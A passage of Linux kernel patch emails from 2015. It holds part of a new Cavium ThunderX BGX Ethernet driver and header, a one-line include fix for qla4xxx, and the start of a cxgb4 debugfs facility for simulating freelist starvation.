cfg; + + bgx_reg_modify(bgx, lmacid, BGX_SPUX_MISC_CONTROL, SPU_MISC_CTL_RX_DIS); + if (bgx->use_training) { + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_INT); + if (!(cfg & (1ull << 13))) { + cfg = (1ull << 13) | (1ull << 14); + bgx_reg_write(bgx, lmacid, BGX_SPUX_INT, cfg); + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_BR_PMD_CRTL); + cfg |= (1ull << 0); + bgx_reg_write(bgx, lmacid, BGX_SPUX_BR_PMD_CRTL, cfg); + return -1; + } + } + + /* wait for PCS to come out of reset */ + if (bgx_poll_reg(bgx, lmacid, BGX_SPUX_CONTROL1, SPU_CTL_RESET, true)) { + dev_err(&bgx->pdev->dev, "BGX SPU reset not completed\n"); + return -1; + } + + if ((lmac_type == BGX_MODE_10G_KR) || (lmac_type == BGX_MODE_XFI) || + (lmac_type == BGX_MODE_40G_KR) || (lmac_type == BGX_MODE_XLAUI)) { + if (bgx_poll_reg(bgx, lmacid, BGX_SPUX_BR_STATUS1, + SPU_BR_STATUS_BLK_LOCK, false)) { + dev_err(&bgx->pdev->dev, + "SPU_BR_STATUS_BLK_LOCK not completed\n"); + return -1; + } + } else { + if (bgx_poll_reg(bgx, lmacid, BGX_SPUX_BX_STATUS, + SPU_BX_STATUS_RX_ALIGN, false)) { + dev_err(&bgx->pdev->dev, + "SPU_BX_STATUS_RX_ALIGN not completed\n"); + return -1; + } + } + + /* Clear rcvflt bit (latching high) and read it back */ + bgx_reg_modify(bgx, lmacid, BGX_SPUX_STATUS2, SPU_STATUS2_RCVFLT); + if (bgx_reg_read(bgx, lmacid, BGX_SPUX_STATUS2) & SPU_STATUS2_RCVFLT) { + dev_err(&bgx->pdev->dev, "Receive fault, retry training\n"); + if (bgx->use_training) { + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_INT); + if (!(cfg & (1ull << 13))) { + cfg = (1ull << 13) | (1ull << 14); + bgx_reg_write(bgx, lmacid, BGX_SPUX_INT, cfg); + cfg = bgx_reg_read(bgx, lmacid, + BGX_SPUX_BR_PMD_CRTL); + cfg |= (1ull << 0); + bgx_reg_write(bgx, lmacid, + BGX_SPUX_BR_PMD_CRTL, cfg); + return -1; + } + } + return -1; + } + + /* Wait for MAC RX to be ready */ + if (bgx_poll_reg(bgx, lmacid, BGX_SMUX_RX_CTL, + SMU_RX_CTL_STATUS, true)) { + dev_err(&bgx->pdev->dev, "SMU RX link not okay\n"); + return -1; + } + + /* Wait for BGX RX to be idle */ + if (bgx_poll_reg(bgx, lmacid, BGX_SMUX_CTL, SMU_CTL_RX_IDLE, false)) { + dev_err(&bgx->pdev->dev, "SMU RX not idle\n"); + return -1; + } + + /* Wait for BGX TX to be idle */ + if (bgx_poll_reg(bgx, lmacid, BGX_SMUX_CTL, SMU_CTL_TX_IDLE, false)) { + dev_err(&bgx->pdev->dev, "SMU TX not idle\n"); + return -1; + } + + if (bgx_reg_read(bgx, lmacid, BGX_SPUX_STATUS2) & SPU_STATUS2_RCVFLT) { + dev_err(&bgx->pdev->dev, "Receive fault\n"); + return -1; + } + + /* Receive link is latching low. Force it high and verify it */ + bgx_reg_modify(bgx, lmacid, BGX_SPUX_STATUS1, SPU_STATUS1_RCV_LNK); + if (bgx_poll_reg(bgx, lmacid, BGX_SPUX_STATUS1, + SPU_STATUS1_RCV_LNK, false)) { + dev_err(&bgx->pdev->dev, "SPU receive link down\n"); + return -1; + } + + cfg = bgx_reg_read(bgx, lmacid, BGX_SPUX_MISC_CONTROL); + cfg &= ~SPU_MISC_CTL_RX_DIS; + bgx_reg_write(bgx, lmacid, BGX_SPUX_MISC_CONTROL, cfg); + return 0; +} + +static void bgx_poll_for_link(struct work_struct *work) +{ + struct lmac *lmac; + u64 link; + + lmac = container_of(work, struct lmac, dwork.work); + + /* Receive link is latching low. Force it high and verify it */ + bgx_reg_modify(lmac->bgx, lmac->lmacid, + BGX_SPUX_STATUS1, SPU_STATUS1_RCV_LNK); + bgx_poll_reg(lmac->bgx, lmac->lmacid, BGX_SPUX_STATUS1, + SPU_STATUS1_RCV_LNK, false); + + link = bgx_reg_read(lmac->bgx, lmac->lmacid, BGX_SPUX_STATUS1); + if (link & SPU_STATUS1_RCV_LNK) { + lmac->link_up = 1; + if (lmac->bgx->lmac_type == BGX_MODE_XLAUI) + lmac->last_speed = 40000; + else + lmac->last_speed = 10000; + lmac->last_duplex = 1; + } else { + lmac->link_up = 0; + } + + if (lmac->last_link != lmac->link_up) { + lmac->last_link = lmac->link_up; + if (lmac->link_up) + bgx_xaui_check_link(lmac); + } + + queue_delayed_work(lmac->check_link, &lmac->dwork, HZ * 2); +} + +static int bgx_lmac_enable(struct bgx *bgx, u8 lmacid) +{ + struct lmac *lmac; + u64 cfg; + + lmac = &bgx->lmac[lmacid]; + lmac->bgx = bgx; + + if (bgx->lmac_type == BGX_MODE_SGMII) { + lmac->is_sgmii = 1; + if (bgx_lmac_sgmii_init(bgx, lmacid)) + return -1; + } else { + lmac->is_sgmii = 0; + if (bgx_lmac_xaui_init(bgx, lmacid, bgx->lmac_type)) + return -1; + } + + if (lmac->is_sgmii) { + cfg = bgx_reg_read(bgx, lmacid, BGX_GMP_GMI_TXX_APPEND); + cfg |= ((1ull << 2) | (1ull << 1)); /* FCS and PAD */ + bgx_reg_modify(bgx, lmacid, BGX_GMP_GMI_TXX_APPEND, cfg); + bgx_reg_write(bgx, lmacid, BGX_GMP_GMI_TXX_MIN_PKT, 60 - 1); + } else { + cfg = bgx_reg_read(bgx, lmacid, BGX_SMUX_TX_APPEND); + cfg |= ((1ull << 2) | (1ull << 1)); /* FCS and PAD */ + bgx_reg_modify(bgx, lmacid, BGX_SMUX_TX_APPEND, cfg); + bgx_reg_write(bgx, lmacid, BGX_SMUX_TX_MIN_PKT, 60 + 4); + } + + /* Enable lmac */ + bgx_reg_modify(bgx, lmacid, BGX_CMRX_CFG, + CMR_EN | CMR_PKT_RX_EN | CMR_PKT_TX_EN); + + /* Restore default cfg, incase low level firmware changed it */ + bgx_reg_write(bgx, lmacid, BGX_CMRX_RX_DMAC_CTL, 0x03); + + if ((bgx->lmac_type != BGX_MODE_XFI) && + (bgx->lmac_type != BGX_MODE_XLAUI) && + (bgx->lmac_type != BGX_MODE_40G_KR) && + (bgx->lmac_type != BGX_MODE_10G_KR)) { + if (!lmac->phydev) + return -ENODEV; + + lmac->phydev->dev_flags = 0; + + if (phy_connect_direct(&lmac->netdev, lmac->phydev, + bgx_lmac_handler, + PHY_INTERFACE_MODE_SGMII)) + return -ENODEV; + + phy_start_aneg(lmac->phydev); + } else { + lmac->check_link = alloc_workqueue("check_link", WQ_UNBOUND | + WQ_MEM_RECLAIM, 1); + if (!lmac->check_link) + return -ENOMEM; + INIT_DELAYED_WORK(&lmac->dwork, bgx_poll_for_link); + queue_delayed_work(lmac->check_link, &lmac->dwork, 0); + } + + return 0; +} + +void bgx_lmac_disable(struct bgx *bgx, u8 lmacid) +{ + struct lmac *lmac; + u64 cmrx_cfg; + + lmac = &bgx->lmac[lmacid]; + if (lmac->check_link) { + /* Destroy work queue */ + cancel_delayed_work(&lmac->dwork); + flush_workqueue(lmac->check_link); + destroy_workqueue(lmac->check_link); + } + + cmrx_cfg = bgx_reg_read(bgx, lmacid, BGX_CMRX_CFG); + cmrx_cfg &= ~(1 << 15); + bgx_reg_write(bgx, lmacid, BGX_CMRX_CFG, cmrx_cfg); + bgx_flush_dmac_addrs(bgx, lmacid); + + if (lmac->phydev) + phy_disconnect(lmac->phydev); + + lmac->phydev = NULL; +} + +static void bgx_set_num_ports(struct bgx *bgx) +{ + u64 lmac_count; + + switch (bgx->qlm_mode) { + case QLM_MODE_SGMII: + bgx->lmac_count = 4; + bgx->lmac_type = BGX_MODE_SGMII; + bgx->lane_to_sds = 0; + break; + case QLM_MODE_XAUI_1X4: + bgx->lmac_count = 1; + bgx->lmac_type = BGX_MODE_XAUI; + bgx->lane_to_sds = 0xE4; + break; + case QLM_MODE_RXAUI_2X2: + bgx->lmac_count = 2; + bgx->lmac_type = BGX_MODE_RXAUI; + bgx->lane_to_sds = 0xE4; + break; + case QLM_MODE_XFI_4X1: + bgx->lmac_count = 4; + bgx->lmac_type = BGX_MODE_XFI; + bgx->lane_to_sds = 0; + break; + case QLM_MODE_XLAUI_1X4: + bgx->lmac_count = 1; + bgx->lmac_type = BGX_MODE_XLAUI; + bgx->lane_to_sds = 0xE4; + break; + case QLM_MODE_10G_KR_4X1: + bgx->lmac_count = 4; + bgx->lmac_type = BGX_MODE_10G_KR; + bgx->lane_to_sds = 0; + bgx->use_training = 1; + break; + case QLM_MODE_40G_KR4_1X4: + bgx->lmac_count = 1; + bgx->lmac_type = BGX_MODE_40G_KR; + bgx->lane_to_sds = 0xE4; + bgx->use_training = 1; + break; + default: + bgx->lmac_count = 0; + break; + } + + /* Check if low level firmware has programmed LMAC count + * based on board type, if yes consider that otherwise + * the default static values + */ + lmac_count = bgx_reg_read(bgx, 0, BGX_CMR_RX_LMACS) & 0x7; + if (lmac_count != 4) + bgx->lmac_count = lmac_count; +} + +static void bgx_init_hw(struct bgx *bgx) +{ + int i; + + bgx_set_num_ports(bgx); + + bgx_reg_modify(bgx, 0, BGX_CMR_GLOBAL_CFG, CMR_GLOBAL_CFG_FCS_STRIP); + if (bgx_reg_read(bgx, 0, BGX_CMR_BIST_STATUS)) + dev_err(&bgx->pdev->dev, "BGX%d BIST failed\n", bgx->bgx_id); + + /* Set lmac type and lane2serdes mapping */ + for (i = 0; i < bgx->lmac_count; i++) { + if (bgx->lmac_type == BGX_MODE_RXAUI) { + if (i) + bgx->lane_to_sds = 0x0e; + else + bgx->lane_to_sds = 0x04; + bgx_reg_write(bgx, i, BGX_CMRX_CFG, + (bgx->lmac_type << 8) | bgx->lane_to_sds); + continue; + } + bgx_reg_write(bgx, i, BGX_CMRX_CFG, + (bgx->lmac_type << 8) | (bgx->lane_to_sds + i)); + bgx->lmac[i].lmacid_bd = lmac_count; + lmac_count++; + } + + bgx_reg_write(bgx, 0, BGX_CMR_TX_LMACS, bgx->lmac_count); + bgx_reg_write(bgx, 0, BGX_CMR_RX_LMACS, bgx->lmac_count); + + /* Set the backpressure AND mask */ + for (i = 0; i < bgx->lmac_count; i++) + bgx_reg_modify(bgx, 0, BGX_CMR_CHAN_MSK_AND, + ((1ULL << MAX_BGX_CHANS_PER_LMAC) - 1) << + (i * MAX_BGX_CHANS_PER_LMAC)); + + /* Disable all MAC filtering */ + for (i = 0; i < RX_DMAC_COUNT; i++) + bgx_reg_write(bgx, 0, BGX_CMR_RX_DMACX_CAM + (i * 8), 0x00); + + /* Disable MAC steering (NCSI traffic) */ + for (i = 0; i < RX_TRAFFIC_STEER_RULE_COUNT; i++) + bgx_reg_write(bgx, 0, BGX_CMR_RX_STREERING + (i * 8), 0x00); +} + +static void bgx_get_qlm_mode(struct bgx *bgx) +{ + struct device *dev = &bgx->pdev->dev; + int lmac_type; + int train_en; + + /* Read LMAC0 type to figure out QLM mode + * This is configured by low level firmware + */ + lmac_type = bgx_reg_read(bgx, 0, BGX_CMRX_CFG); + lmac_type = (lmac_type >> 8) & 0x07; + + train_en = bgx_reg_read(bgx, 0, BGX_SPUX_BR_PMD_CRTL) & + SPU_PMD_CRTL_TRAIN_EN; + + switch (lmac_type) { + case BGX_MODE_SGMII: + bgx->qlm_mode = QLM_MODE_SGMII; + dev_info(dev, "BGX%d QLM mode: SGMII\n", bgx->bgx_id); + break; + case BGX_MODE_XAUI: + bgx->qlm_mode = QLM_MODE_XAUI_1X4; + dev_info(dev, "BGX%d QLM mode: XAUI\n", bgx->bgx_id); + break; + case BGX_MODE_RXAUI: + bgx->qlm_mode = QLM_MODE_RXAUI_2X2; + dev_info(dev, "BGX%d QLM mode: RXAUI\n", bgx->bgx_id); + break; + case BGX_MODE_XFI: + if (!train_en) { + bgx->qlm_mode = QLM_MODE_XFI_4X1; + dev_info(dev, "BGX%d QLM mode: XFI\n", bgx->bgx_id); + } else { + bgx->qlm_mode = QLM_MODE_10G_KR_4X1; + dev_info(dev, "BGX%d QLM mode: 10G_KR\n", bgx->bgx_id); + } + break; + case BGX_MODE_XLAUI: + if (!train_en) { + bgx->qlm_mode = QLM_MODE_XLAUI_1X4; + dev_info(dev, "BGX%d QLM mode: XLAUI\n", bgx->bgx_id); + } else { + bgx->qlm_mode = QLM_MODE_40G_KR4_1X4; + dev_info(dev, "BGX%d QLM mode: 40G_KR4\n", bgx->bgx_id); + } + break; + default: + bgx->qlm_mode = QLM_MODE_SGMII; + dev_info(dev, "BGX%d QLM default mode: SGMII\n", bgx->bgx_id); + } +} + +static void bgx_init_of(struct bgx *bgx, struct device_node *np) +{ + struct device_node *np_child; + u8 lmac = 0; + + for_each_child_of_node(np, np_child) { + struct device_node *phy_np; + const char *mac; + + phy_np = of_parse_phandle(np_child, "phy-handle", 0); + if (phy_np) + bgx->lmac[lmac].phydev = of_phy_find_device(phy_np); + + mac = of_get_mac_address(np_child); + if (mac) + ether_addr_copy(bgx->lmac[lmac].mac, mac); + + SET_NETDEV_DEV(&bgx->lmac[lmac].netdev, &bgx->pdev->dev); + bgx->lmac[lmac].lmacid = lmac; + lmac++; + if (lmac == MAX_LMAC_PER_BGX) + break; + } +} + +static int bgx_probe(struct pci_dev *pdev, const struct pci_device_id *ent) +{ + int err; + struct device *dev = &pdev->dev; + struct bgx *bgx = NULL; + struct device_node *np; + char bgx_sel[5]; + u8 lmac; + + bgx = devm_kzalloc(dev, sizeof(*bgx), GFP_KERNEL); + if (!bgx) + return -ENOMEM; + bgx->pdev = pdev; + + pci_set_drvdata(pdev, bgx); + + err = pci_enable_device(pdev); + if (err) { + dev_err(dev, "Failed to enable PCI device\n"); + pci_set_drvdata(pdev, NULL); + return err; + } + + err = pci_request_regions(pdev, DRV_NAME); + if (err) { + dev_err(dev, "PCI request regions failed 0x%x\n", err); + goto err_disable_device; + } + + /* MAP configuration registers */ + bgx->reg_base = pcim_iomap(pdev, PCI_CFG_REG_BAR_NUM, 0); + if (!bgx->reg_base) { + dev_err(dev, "BGX: Cannot map CSR memory space, aborting\n"); + err = -ENOMEM; + goto err_release_regions; + } + bgx->bgx_id = (pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM) >> 24) & 1; + bgx->bgx_id += NODE_ID(pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM)) + * MAX_BGX_PER_CN88XX; + bgx_vnic[bgx->bgx_id] = bgx; + bgx_get_qlm_mode(bgx); + + snprintf(bgx_sel, 5, "bgx%d", bgx->bgx_id); + np = of_find_node_by_name(NULL, bgx_sel); + if (np) + bgx_init_of(bgx, np); + + bgx_init_hw(bgx); + + /* Enable all LMACs */ + for (lmac = 0; lmac < bgx->lmac_count; lmac++) { + err = bgx_lmac_enable(bgx, lmac); + if (err) { + dev_err(dev, "BGX%d failed to enable lmac%d\n", + bgx->bgx_id, lmac); + goto err_enable; + } + } + + return 0; + +err_enable: + bgx_vnic[bgx->bgx_id] = NULL; +err_release_regions: + pci_release_regions(pdev); +err_disable_device: + pci_disable_device(pdev); + pci_set_drvdata(pdev, NULL); + return err; +} + +static void bgx_remove(struct pci_dev *pdev) +{ + struct bgx *bgx = pci_get_drvdata(pdev); + u8 lmac; + + /* Disable all LMACs */ + for (lmac = 0; lmac < bgx->lmac_count; lmac++) + bgx_lmac_disable(bgx, lmac); + + bgx_vnic[bgx->bgx_id] = NULL; + pci_release_regions(pdev); + pci_disable_device(pdev); + pci_set_drvdata(pdev, NULL); +} + +static struct pci_driver bgx_driver = { + .name = DRV_NAME, + .id_table = bgx_id_table, + .probe = bgx_probe, + .remove = bgx_remove, +}; + +static int __init bgx_init_module(void) +{ + pr_info("%s, ver %s\n", DRV_NAME, DRV_VERSION); + + return pci_register_driver(&bgx_driver); +} + +static void __exit bgx_cleanup_module(void) +{ + pci_unregister_driver(&bgx_driver); +} + +module_init(bgx_init_module); +module_exit(bgx_cleanup_module); diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.h b/drivers/net/ethernet/cavium/thunder/thunder_bgx.h new file mode 100644 index 000000000000..9d91ce44f8d7 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.h @@ -0,0 +1,223 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#ifndef THUNDER_BGX_H +#define THUNDER_BGX_H + +#define MAX_BGX_THUNDER 8 /* Max 4 nodes, 2 per node */ +#define MAX_BGX_PER_CN88XX 2 +#define MAX_LMAC_PER_BGX 4 +#define MAX_BGX_CHANS_PER_LMAC 16 +#define MAX_DMAC_PER_LMAC 8 +#define MAX_FRAME_SIZE 9216 + +#define MAX_DMAC_PER_LMAC_TNS_BYPASS_MODE 2 + +#define MAX_LMAC (MAX_BGX_PER_CN88XX * MAX_LMAC_PER_BGX) + +#define NODE_ID_MASK 0x300000000000 +#define NODE_ID(x) ((x & NODE_ID_MASK) >> 44) + +/* Registers */ +#define BGX_CMRX_CFG 0x00 +#define CMR_PKT_TX_EN BIT_ULL(13) +#define CMR_PKT_RX_EN BIT_ULL(14) +#define CMR_EN BIT_ULL(15) +#define BGX_CMR_GLOBAL_CFG 0x08 +#define CMR_GLOBAL_CFG_FCS_STRIP BIT_ULL(6) +#define BGX_CMRX_RX_ID_MAP 0x60 +#define BGX_CMRX_RX_STAT0 0x70 +#define BGX_CMRX_RX_STAT1 0x78 +#define BGX_CMRX_RX_STAT2 0x80 +#define BGX_CMRX_RX_STAT3 0x88 +#define BGX_CMRX_RX_STAT4 0x90 +#define BGX_CMRX_RX_STAT5 0x98 +#define BGX_CMRX_RX_STAT6 0xA0 +#define BGX_CMRX_RX_STAT7 0xA8 +#define BGX_CMRX_RX_STAT8 0xB0 +#define BGX_CMRX_RX_STAT9 0xB8 +#define BGX_CMRX_RX_STAT10 0xC0 +#define BGX_CMRX_RX_BP_DROP 0xC8 +#define BGX_CMRX_RX_DMAC_CTL 0x0E8 +#define BGX_CMR_RX_DMACX_CAM 0x200 +#define RX_DMACX_CAM_EN BIT_ULL(48) +#define RX_DMACX_CAM_LMACID(x) (x << 49) +#define RX_DMAC_COUNT 32 +#define BGX_CMR_RX_STREERING 0x300 +#define RX_TRAFFIC_STEER_RULE_COUNT 8 +#define BGX_CMR_CHAN_MSK_AND 0x450 +#define BGX_CMR_BIST_STATUS 0x460 +#define BGX_CMR_RX_LMACS 0x468 +#define BGX_CMRX_TX_STAT0 0x600 +#define BGX_CMRX_TX_STAT1 0x608 +#define BGX_CMRX_TX_STAT2 0x610 +#define BGX_CMRX_TX_STAT3 0x618 +#define BGX_CMRX_TX_STAT4 0x620 +#define BGX_CMRX_TX_STAT5 0x628 +#define BGX_CMRX_TX_STAT6 0x630 +#define BGX_CMRX_TX_STAT7 0x638 +#define BGX_CMRX_TX_STAT8 0x640 +#define BGX_CMRX_TX_STAT9 0x648 +#define BGX_CMRX_TX_STAT10 0x650 +#define BGX_CMRX_TX_STAT11 0x658 +#define BGX_CMRX_TX_STAT12 0x660 +#define BGX_CMRX_TX_STAT13 0x668 +#define BGX_CMRX_TX_STAT14 0x670 +#define BGX_CMRX_TX_STAT15 0x678 +#define BGX_CMRX_TX_STAT16 0x680 +#define BGX_CMRX_TX_STAT17 0x688 +#define BGX_CMR_TX_LMACS 0x1000 + +#define BGX_SPUX_CONTROL1 0x10000 +#define SPU_CTL_LOW_POWER BIT_ULL(11) +#define SPU_CTL_RESET BIT_ULL(15) +#define BGX_SPUX_STATUS1 0x10008 +#define SPU_STATUS1_RCV_LNK BIT_ULL(2) +#define BGX_SPUX_STATUS2 0x10020 +#define SPU_STATUS2_RCVFLT BIT_ULL(10) +#define BGX_SPUX_BX_STATUS 0x10028 +#define SPU_BX_STATUS_RX_ALIGN BIT_ULL(12) +#define BGX_SPUX_BR_STATUS1 0x10030 +#define SPU_BR_STATUS_BLK_LOCK BIT_ULL(0) +#define SPU_BR_STATUS_RCV_LNK BIT_ULL(12) +#define BGX_SPUX_BR_PMD_CRTL 0x10068 +#define SPU_PMD_CRTL_TRAIN_EN BIT_ULL(1) +#define BGX_SPUX_BR_PMD_LP_CUP 0x10078 +#define BGX_SPUX_BR_PMD_LD_CUP 0x10088 +#define BGX_SPUX_BR_PMD_LD_REP 0x10090 +#define BGX_SPUX_FEC_CONTROL 0x100A0 +#define SPU_FEC_CTL_FEC_EN BIT_ULL(0) +#define SPU_FEC_CTL_ERR_EN BIT_ULL(1) +#define BGX_SPUX_AN_CONTROL 0x100C8 +#define SPU_AN_CTL_AN_EN BIT_ULL(12) +#define SPU_AN_CTL_XNP_EN BIT_ULL(13) +#define BGX_SPUX_AN_ADV 0x100D8 +#define BGX_SPUX_MISC_CONTROL 0x10218 +#define SPU_MISC_CTL_INTLV_RDISP BIT_ULL(10) +#define SPU_MISC_CTL_RX_DIS BIT_ULL(12) +#define BGX_SPUX_INT 0x10220 /* +(0..3) << 20 */ +#define BGX_SPUX_INT_W1S 0x10228 +#define BGX_SPUX_INT_ENA_W1C 0x10230 +#define BGX_SPUX_INT_ENA_W1S 0x10238 +#define BGX_SPU_DBG_CONTROL 0x10300 +#define SPU_DBG_CTL_AN_ARB_LINK_CHK_EN BIT_ULL(18) +#define SPU_DBG_CTL_AN_NONCE_MCT_DIS BIT_ULL(29) + +#define BGX_SMUX_RX_INT 0x20000 +#define BGX_SMUX_RX_JABBER 0x20030 +#define BGX_SMUX_RX_CTL 0x20048 +#define SMU_RX_CTL_STATUS (3ull << 0) +#define BGX_SMUX_TX_APPEND 0x20100 +#define SMU_TX_APPEND_FCS_D BIT_ULL(2) +#define BGX_SMUX_TX_MIN_PKT 0x20118 +#define BGX_SMUX_TX_INT 0x20140 +#define BGX_SMUX_TX_CTL 0x20178 +#define SMU_TX_CTL_DIC_EN BIT_ULL(0) +#define SMU_TX_CTL_UNI_EN BIT_ULL(1) +#define SMU_TX_CTL_LNK_STATUS (3ull << 4) +#define BGX_SMUX_TX_THRESH 0x20180 +#define BGX_SMUX_CTL 0x20200 +#define SMU_CTL_RX_IDLE BIT_ULL(0) +#define SMU_CTL_TX_IDLE BIT_ULL(1) + +#define BGX_GMP_PCS_MRX_CTL 0x30000 +#define PCS_MRX_CTL_RST_AN BIT_ULL(9) +#define PCS_MRX_CTL_PWR_DN BIT_ULL(11) +#define PCS_MRX_CTL_AN_EN BIT_ULL(12) +#define PCS_MRX_CTL_RESET BIT_ULL(15) +#define BGX_GMP_PCS_MRX_STATUS 0x30008 +#define PCS_MRX_STATUS_AN_CPT BIT_ULL(5) +#define BGX_GMP_PCS_ANX_AN_RESULTS 0x30020 +#define BGX_GMP_PCS_SGM_AN_ADV 0x30068 +#define BGX_GMP_PCS_MISCX_CTL 0x30078 +#define PCS_MISC_CTL_GMX_ENO BIT_ULL(11) +#define PCS_MISC_CTL_SAMP_PT_MASK 0x7Full +#define BGX_GMP_GMI_PRTX_CFG 0x38020 +#define GMI_PORT_CFG_SPEED BIT_ULL(1) +#define GMI_PORT_CFG_DUPLEX BIT_ULL(2) +#define GMI_PORT_CFG_SLOT_TIME BIT_ULL(3) +#define GMI_PORT_CFG_SPEED_MSB BIT_ULL(8) +#define BGX_GMP_GMI_RXX_JABBER 0x38038 +#define BGX_GMP_GMI_TXX_THRESH 0x38210 +#define BGX_GMP_GMI_TXX_APPEND 0x38218 +#define BGX_GMP_GMI_TXX_SLOT 0x38220 +#define BGX_GMP_GMI_TXX_BURST 0x38228 +#define BGX_GMP_GMI_TXX_MIN_PKT 0x38240 +#define BGX_GMP_GMI_TXX_SGMII_CTL 0x38300 + +#define BGX_MSIX_VEC_0_29_ADDR 0x400000 /* +(0..29) << 4 */ +#define BGX_MSIX_VEC_0_29_CTL 0x400008 +#define BGX_MSIX_PBA_0 0x4F0000 + +/* MSI-X interrupts */ +#define BGX_MSIX_VECTORS 30 +#define BGX_LMAC_VEC_OFFSET 7 +#define BGX_MSIX_VEC_SHIFT 4 + +#define CMRX_INT 0 +#define SPUX_INT 1 +#define SMUX_RX_INT 2 +#define SMUX_TX_INT 3 +#define GMPX_PCS_INT 4 +#define GMPX_GMI_RX_INT 5 +#define GMPX_GMI_TX_INT 6 +#define CMR_MEM_INT 28 +#define SPU_MEM_INT 29 + +#define LMAC_INTR_LINK_UP BIT(0) +#define LMAC_INTR_LINK_DOWN BIT(1) + +/* RX_DMAC_CTL configuration*/ +enum MCAST_MODE { + MCAST_MODE_REJECT, + MCAST_MODE_ACCEPT, + MCAST_MODE_CAM_FILTER, + RSVD +}; + +#define BCAST_ACCEPT 1 +#define CAM_ACCEPT 1 + +void bgx_add_dmac_addr(u64 dmac, int node, int bgx_idx, int lmac); +unsigned bgx_get_map(int node); +int bgx_get_lmac_count(int node, int bgx); +const char *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid); +void bgx_set_lmac_mac(int node, int bgx_idx, int lmacid, const char *mac); +void bgx_get_lmac_link_state(int node, int bgx_idx, int lmacid, void *status); +u64 bgx_get_rx_stats(int node, int bgx_idx, int lmac, int idx); +u64 bgx_get_tx_stats(int node, int bgx_idx, int lmac, int idx); +#define BGX_RX_STATS_COUNT 11 +#define BGX_TX_STATS_COUNT 18 + +struct bgx_stats { + u64 rx_stats[BGX_RX_STATS_COUNT]; + u64 tx_stats[BGX_TX_STATS_COUNT]; +}; + +enum LMAC_TYPE { + BGX_MODE_SGMII = 0, /* 1 lane, 1.250 Gbaud */ + BGX_MODE_XAUI = 1, /* 4 lanes, 3.125 Gbaud */ + BGX_MODE_DXAUI = 1, /* 4 lanes, 6.250 Gbaud */ + BGX_MODE_RXAUI = 2, /* 2 lanes, 6.250 Gbaud */ + BGX_MODE_XFI = 3, /* 1 lane, 10.3125 Gbaud */ + BGX_MODE_XLAUI = 4, /* 4 lanes, 10.3125 Gbaud */ + BGX_MODE_10G_KR = 3,/* 1 lane, 10.3125 Gbaud */ + BGX_MODE_40G_KR = 4,/* 4 lanes, 10.3125 Gbaud */ +}; + +enum qlm_mode { + QLM_MODE_SGMII, /* SGMII, each lane independent */ + QLM_MODE_XAUI_1X4, /* 1 XAUI or DXAUI, 4 lanes */ + QLM_MODE_RXAUI_2X2, /* 2 RXAUI, 2 lanes each */ + QLM_MODE_XFI_4X1, /* 4 XFI, 1 lane each */ + QLM_MODE_XLAUI_1X4, /* 1 XLAUI, 4 lanes each */ + QLM_MODE_10G_KR_4X1, /* 4 10GBASE-KR, 1 lane each */ + QLM_MODE_40G_KR4_1X4, /* 1 40GBASE-KR4, 4 lanes each */ +}; + +#endif /* THUNDER_BGX_H */ From c6bfda8d72c485b2eee1642cbcbd92e3fbb93ed3 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Tue, 26 May 2015 21:43:44 -0700 Subject: [PATCH 319/872] qla4xxx: add a missing include vmalloc.h used to be included from include/net/inet_hashtables.h but it is no longer the case. Fixes: 095dc8e0c368 ("tcp: fix/cleanup inet_ehash_locks_alloc()") Reported-by: kbuild test robot Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller --- drivers/scsi/qla4xxx/ql4_def.h | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/scsi/qla4xxx/ql4_def.h b/drivers/scsi/qla4xxx/ql4_def.h index 8f6d0fb2cd80..a7cfc270bd08 100644 --- a/drivers/scsi/qla4xxx/ql4_def.h +++ b/drivers/scsi/qla4xxx/ql4_def.h @@ -26,6 +26,7 @@ #include #include #include +#include #include #include From 5b377d114f2b9ceed97ed84ef32d2afededfcc31 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Wed, 27 May 2015 22:30:23 +0530 Subject: [PATCH 320/872] cxgb4: Add debugfs facility to inject FL starvation Add debugfs entry to inject Freelist starvation, used only for debugging purpose. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 1 + .../ethernet/chelsio/cxgb4/cxgb4_debugfs.c | 56 +++++++++++++++++++ .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 20 ++++++- drivers/net/ethernet/chelsio/cxgb4/sge.c | 5 ++ 4 files changed, 81 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 3c109d115365..63c30f325929 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -650,6 +650,7 @@ struct sge { struct sge_rspq **ingr_map; /* qid->queue ingress queue map */ unsigned long *starving_fl; unsigned long *txq_maperr; + unsigned long *blocked_fl; struct timer_list rx_timer; /* refills starving FLs */ struct timer_list tx_timer; /* checks Tx queues */ }; diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c index 371f75e782e5..3fa363232283 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c @@ -1959,6 +1959,61 @@ static void add_debugfs_mem(struct adapter *adap, const char *name, size_mb << 20); } +static int blocked_fl_open(struct inode *inode, struct file *file) +{ + file->private_data = inode->i_private; + return 0; +} + +static ssize_t blocked_fl_read(struct file *filp, char __user *ubuf, + size_t count, loff_t *ppos) +{ + int len; + const struct adapter *adap = filp->private_data; + char *buf; + ssize_t size = (adap->sge.egr_sz + 3) / 4 + + adap->sge.egr_sz / 32 + 2; /* includes ,/\n/\0 */ + + buf = 